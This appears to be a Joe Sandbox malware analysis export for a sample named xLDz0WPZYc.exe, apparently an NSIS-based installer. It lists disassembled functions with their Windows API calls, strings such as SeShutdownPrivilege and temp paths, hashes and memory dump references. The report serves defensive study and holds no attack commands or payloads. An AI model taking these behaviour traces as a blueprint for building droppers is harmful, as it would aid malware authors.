Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4083868402
Opcode ID: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
Instruction ID: 1eddd4fff873b62aaaaf221bd6291171136980a6a9d1eb58fe3111f1a180586d
Opcode Fuzzy Hash: c1f6b4989b579ccb4d1bab47613fbee0e7e5134bf480dcc377e5cd6992e46223
Instruction Fuzzy Hash: 26E0C233811020ABC7216F56EC09B9ABB686F48B32F06442AED407B3B0D7746D418FD8

Function 00405694 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xLDz0WPZYc.exe,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 0040569A
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C95,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xLDz0WPZYc.exe,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 004056A8

Strings

C:\Users\user\Desktop, xrefs: 00405694

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1876063424
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: 684961cdd3a6b9df4e479839de86435c839074591af8eb1459d6379f3a08a3e1
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 04D0A772409D701EF30353108C04B8F7A88CF13300F490862E040E2191C37C1C818BBE

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Function 004057B3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
lstrcmpiA.KERNEL32(004059E2,00000000), ref: 004057DB
CharNextA.USER32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057EC
lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction ID: ad6d9dedd63ee89ffd4e190405b35f06ce6ae84d6c36acf6f04f4a95cd08f7cb
Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
Instruction Fuzzy Hash: 66F0C232604558FFCB12DBA4DD4099EBBA8EF06350B2140B9F800F7210D274EE01ABA9

Analysis Process: xLDz0WPZYc.exePID: 4416, Parent PID: 1840COMMON

Non-executed Functions

Function 00404823 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040483B
GetDlgItem.USER32(?,00000408), ref: 00404846
GlobalAlloc.KERNEL32(?,?), ref: 00404890
LoadBitmapA.USER32(0000006E), ref: 004048A3
SetWindowLongA.USER32(?,?,00404E1A), ref: 004048BC
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004048D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048E2
SendMessageA.USER32(?,00001109,00000002), ref: 004048F8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404904
SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404916
DeleteObject.GDI32(00000000), ref: 00404919
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404944
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404950
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E5
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A10
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A24
GetWindowLongA.USER32(?,?), ref: 00404A53
SetWindowLongA.USER32(?,?,00000000), ref: 00404A61
ShowWindow.USER32(?,00000005), ref: 00404A72
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B6F
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BD4
SendMessageA.USER32(?,?,00000000,00000000), ref: 00404BE9
SendMessageA.USER32(?,00000420,00000000,?), ref: 00404C0D
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C2D
ImageList_Destroy.COMCTL32(?), ref: 00404C42
GlobalFree.KERNEL32(?), ref: 00404C52
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CCB
SendMessageA.USER32(?,00001102,?,?), ref: 00404D74
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D83
InvalidateRect.USER32(?,00000000,?), ref: 00404DA3
ShowWindow.USER32(?,00000000), ref: 00404DF1
GetDlgItem.USER32(?,000003FE), ref: 00404DFC
ShowWindow.USER32(00000000), ref: 00404E03

Strings

, xrefs: 00404DDB
N, xrefs: 00404AAD
M, xrefs: 004049CC

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 2bac73a8463ad052ddef45fc847bc96a6d0bdbf5e3dded91a25113f7f072d885
Instruction ID: e15dc7f2636af8312206252945434afb9f5109210b4da1b7208a5bfe9f4b469d
Opcode Fuzzy Hash: 2bac73a8463ad052ddef45fc847bc96a6d0bdbf5e3dded91a25113f7f072d885
Instruction Fuzzy Hash: F30281B0A00209AFDB20DF54DD45AAE7BB5FB84315F10813AF610BA2E1D7789E42DF58

Function 004030B6 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 337stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 004030D7
SetErrorMode.KERNEL32(00008001), ref: 004030E2
OleInitialize.OLE32(00000000), ref: 004030E9

Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
Part of subcall function 00405EE8: LoadLibraryA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405F05
Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16

SHGetFileInfoA.SHELL32(0041EC98,00000000,?,?,00000000,00000009), ref: 00403111

Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,00422EE0,NSIS Error), ref: 00405BCA

GetCommandLineA.KERNEL32(00422EE0,NSIS Error), ref: 00403126
GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 00403139
CharNextA.USER32(00000000,00429000,00000020), ref: 00403164
GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 00403261
GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 00403272
lstrcatA.KERNEL32(0042A400,\Temp), ref: 0040327E
GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 00403292
lstrcatA.KERNEL32(0042A400,Low), ref: 0040329A
SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 004032AB
SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 004032B3
DeleteFileA.KERNEL32(0042A000), ref: 004032C7
OleUninitialize.OLE32(?), ref: 00403375
ExitProcess.KERNEL32 ref: 00403395
lstrcatA.KERNEL32(0042A400,~nsu.tmp,00429000,00000000,?), ref: 004033A1
lstrcmpiA.KERNEL32(0042A400,00429C00), ref: 004033AD
CreateDirectoryA.KERNEL32(0042A400,00000000), ref: 004033B9
SetCurrentDirectoryA.KERNEL32(0042A400), ref: 004033C0
DeleteFileA.KERNEL32(0041E898,0041E898,?,00424000,?), ref: 00403419
CopyFileA.KERNEL32(0042AC00,0041E898,?), ref: 0040342D
CloseHandle.KERNEL32(00000000,0041E898,0041E898,?,0041E898,00000000), ref: 0040345A
GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 004034B3
ExitWindowsEx.USER32(00000002,80040002), ref: 0040350B
ExitProcess.KERNEL32 ref: 0040352E

Strings

TMP, xrefs: 004032AE
SeShutdownPrivilege, xrefs: 004034C5
Error launching installer, xrefs: 0040332D
TEMP, xrefs: 004032A6
Low, xrefs: 00403294
~nsu.tmp, xrefs: 0040339B
", xrefs: 00403189
\Temp, xrefs: 00403278
NSIS Error, xrefs: 00403117

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1245305578
Opcode ID: b388abb6f0700d973de48b09ee8961882102ef4dc3b61a6a4565489c61c931a6
Instruction ID: 19acd6a9e22a62aa3fa635d9352380a3979e711e0520c28b60a65d3217cef685
Opcode Fuzzy Hash: b388abb6f0700d973de48b09ee8961882102ef4dc3b61a6a4565489c61c931a6
Instruction Fuzzy Hash: 87B1E370A082516AE7216F755C89B2B7EACEB45306F04057FF581B62D2C77C9E01CB6E

Function 0040547D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,0042A400,75573410,00000000), ref: 004054A6
lstrcatA.KERNEL32(00420CE0,\*.*,00420CE0,?,?,0042A400,75573410,00000000), ref: 004054EE
lstrcatA.KERNEL32(?,00409014,?,00420CE0,?,?,0042A400,75573410,00000000), ref: 0040550F
lstrlenA.KERNEL32(?,?,00409014,?,00420CE0,?,?,0042A400,75573410,00000000), ref: 00405515
FindFirstFileA.KERNEL32(00420CE0,?,?,?,00409014,?,00420CE0,?,?,0042A400,75573410,00000000), ref: 00405526
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055D3
FindClose.KERNEL32(00000000), ref: 004055E4

Strings

\*.*, xrefs: 004054E8

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 69f52b3cc5ebe97eecd0483cdb7f98893bb480c3d996df3ac4eaac56146caa8f
Instruction ID: f67e5f98a1b48f8b06c5baa1d65efce896aecc78963fcddf766b22b57dd7cee7
Opcode Fuzzy Hash: 69f52b3cc5ebe97eecd0483cdb7f98893bb480c3d996df3ac4eaac56146caa8f
Instruction Fuzzy Hash: 1851C070800A04BADF21AB25CC45BAF7AB9DB42314F14417BF444752D6D73C9A82DEAD

Function 00406197 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
Instruction ID: 01902b0c5badf26c21563370f74918c90dc48b9c290b8d647ce642e1aeaa84f8
Opcode Fuzzy Hash: 208b979f7471c67888a02c39f93206778dc1c3e33f97723ffc6ad1ac2506ac0b
Instruction Fuzzy Hash: 99F18671D00229CBDF28CFA8C8946ADBBB0FF45305F25856ED856BB281D7385A96CF44

Function 00404FE4 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405043
GetDlgItem.USER32(?,000003EE), ref: 00405052
GetClientRect.USER32(?,?), ref: 0040508F
GetSystemMetrics.USER32(00000002), ref: 00405096
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004050B7
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050C8
SendMessageA.USER32(?,00001001,00000000,?), ref: 004050DB
SendMessageA.USER32(?,00001026,00000000,?), ref: 004050E9
SendMessageA.USER32(?,00001024,00000000,?), ref: 004050FC
ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040511E
ShowWindow.USER32(?,?), ref: 00405132
GetDlgItem.USER32(?,000003EC), ref: 00405153
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405163
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040517C
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405188
GetDlgItem.USER32(?,000003F8), ref: 00405061

Part of subcall function 00403EA8: SendMessageA.USER32(?,?,?,00403CD9), ref: 00403EB6

GetDlgItem.USER32(?,000003EC), ref: 004051A4
CreateThread.KERNEL32(00000000,00000000,Function_00004F78,00000000), ref: 004051B2
CloseHandle.KERNEL32(00000000), ref: 004051B9
ShowWindow.USER32(00000000), ref: 004051DC
ShowWindow.USER32(?,?), ref: 004051E3
ShowWindow.USER32(?), ref: 00405229
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040525D
CreatePopupMenu.USER32 ref: 0040526E
AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405283
GetWindowRect.USER32(?,000000FF), ref: 004052A3
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 004052BC
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052F8
OpenClipboard.USER32(00000000), ref: 00405308
EmptyClipboard.USER32 ref: 0040530E
GlobalAlloc.KERNEL32(00000042,?), ref: 00405317
GlobalLock.KERNEL32(00000000), ref: 00405321
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405335
GlobalUnlock.KERNEL32(00000000), ref: 0040534E
SetClipboardData.USER32(?,00000000), ref: 00405359
CloseClipboard.USER32 ref: 0040535F

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: b381ff07accca91b740710533184a9ab3046fb0851b53a6dd09934ff7c98f27d
Instruction ID: 5eb751775e690fc0911b0246dac1cecdda29a979763143f7b886e47eaa108cfb
Opcode Fuzzy Hash: b381ff07accca91b740710533184a9ab3046fb0851b53a6dd09934ff7c98f27d
Instruction Fuzzy Hash: 8AA16971900208BFDB219FA0DD89EAE7F79FB08345F10407AFA01B61A0C7B55E519FA9

Function 004039A0 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039DC
ShowWindow.USER32(?), ref: 004039F9
DestroyWindow.USER32 ref: 00403A0D
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A29
GetDlgItem.USER32(?,?), ref: 00403A4A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A5E
IsWindowEnabled.USER32(00000000), ref: 00403A65
GetDlgItem.USER32(?,?), ref: 00403B13
GetDlgItem.USER32(?,00000002), ref: 00403B1D
SetClassLongA.USER32(?,000000F2,?), ref: 00403B37
SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403B88
GetDlgItem.USER32(?,00000003), ref: 00403C2E
ShowWindow.USER32(00000000,?), ref: 00403C4F
EnableWindow.USER32(?,?), ref: 00403C61
EnableWindow.USER32(?,?), ref: 00403C7C
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403C92
EnableMenuItem.USER32(00000000), ref: 00403C99
SendMessageA.USER32(?,?,00000000,?), ref: 00403CB1
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CC4
lstrlenA.KERNEL32(0041FCD8,?,0041FCD8,00422EE0), ref: 00403CED
SetWindowTextA.USER32(?,0041FCD8), ref: 00403CFC
ShowWindow.USER32(?,0000000A), ref: 00403E30

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 31da440197e13903ab35b5caa29c44a62f565bed6df0edc6ad1ad95b187a0634
Instruction ID: 6a308cc8f2d4566e8290075db2a5fe9cea5b682110ca7f7f0817dc9b094a1d3c
Opcode Fuzzy Hash: 31da440197e13903ab35b5caa29c44a62f565bed6df0edc6ad1ad95b187a0634
Instruction Fuzzy Hash: 0EC1D271604204BBDB21AF61ED45E2B3E7DFB44706B40053EF641B12E1C779A942AF6E

Function 0040360E Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405EE8: GetModuleHandleA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405EFA
Part of subcall function 00405EE8: LoadLibraryA.KERNEL32(?,?,?,004030FB,00000009), ref: 00405F05
Part of subcall function 00405EE8: GetProcAddress.KERNEL32(00000000,?), ref: 00405F16

lstrcatA.KERNEL32(0042A000,0041FCD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCD8,00000000,00000002,0042A400,75573410,00429000,00000000), ref: 00403689
lstrlenA.KERNEL32(00422680,?,?,?,00422680,00000000,00429400,0042A000,0041FCD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FCD8,00000000,00000002,0042A400), ref: 004036FE
lstrcmpiA.KERNEL32(?,.exe), ref: 00403711
GetFileAttributesA.KERNEL32(00422680), ref: 0040371C
LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00429400), ref: 00403765

Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28

RegisterClassA.USER32(00422E80), ref: 004037A2
SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004037BA
CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037EF
ShowWindow.USER32(00000005,00000000), ref: 00403825
LoadLibraryA.KERNEL32(RichEd20), ref: 00403836
LoadLibraryA.KERNEL32(RichEd32), ref: 00403841
GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 00403851
GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 0040385E
RegisterClassA.USER32(00422E80), ref: 00403867
DialogBoxParamA.USER32(?,00000000,004039A0,00000000), ref: 00403886

Strings

RichEdit20A, xrefs: 00403849, 0040384F
_Nb, xrefs: 00403781, 004037E9
Control Panel\Desktop\ResourceLocale, xrefs: 00403642
.DEFAULT\Control Panel\International, xrefs: 00403674
RichEdit, xrefs: 00403858
RichEd32, xrefs: 0040383C
.exe, xrefs: 0040370B
RichEd20, xrefs: 00403831

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-2904746566
Opcode ID: 7971d35071aa05ff81dab10e926d659a2f5e0700c3d851db6bb124140eeac98e
Instruction ID: a1152651de681702ec182a4452d53c4528d9546a1521c59b1686b62f96f1e611
Opcode Fuzzy Hash: 7971d35071aa05ff81dab10e926d659a2f5e0700c3d851db6bb124140eeac98e
Instruction Fuzzy Hash: 966107B16442007FD7206F659D85F2B3AACEB4474AF40457FF840B62E1C7BD6D029A2E

Function 00403FBC Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404047
GetDlgItem.USER32(00000000,000003E8), ref: 0040405B
SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404079
GetSysColor.USER32(?), ref: 0040408A
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404099
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040A8
lstrlenA.KERNEL32(?), ref: 004040AB
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040BA
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040CF
GetDlgItem.USER32(?,0000040A), ref: 00404131
SendMessageA.USER32(00000000), ref: 00404134
GetDlgItem.USER32(?,000003E8), ref: 0040415F
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040419F
LoadCursorA.USER32(00000000,00007F02), ref: 004041AE
SetCursor.USER32(00000000), ref: 004041B7
ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 004041CA
LoadCursorA.USER32(00000000,00007F00), ref: 004041D7
SetCursor.USER32(00000000), ref: 004041DA
SendMessageA.USER32(00000111,?,00000000), ref: 00404206
SendMessageA.USER32(?,00000000,00000000), ref: 0040421A

Strings

open, xrefs: 004041C2
N, xrefs: 0040414D

Memory Dump Source

Source File: 00000003.00000002.3325956783.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3325936769.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325971791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3325986474.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3326004955.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
Instruction ID: 7c7fff9fd1e172092069843c90e077616bef9326b7299cf1cce5c9f34bd91e75
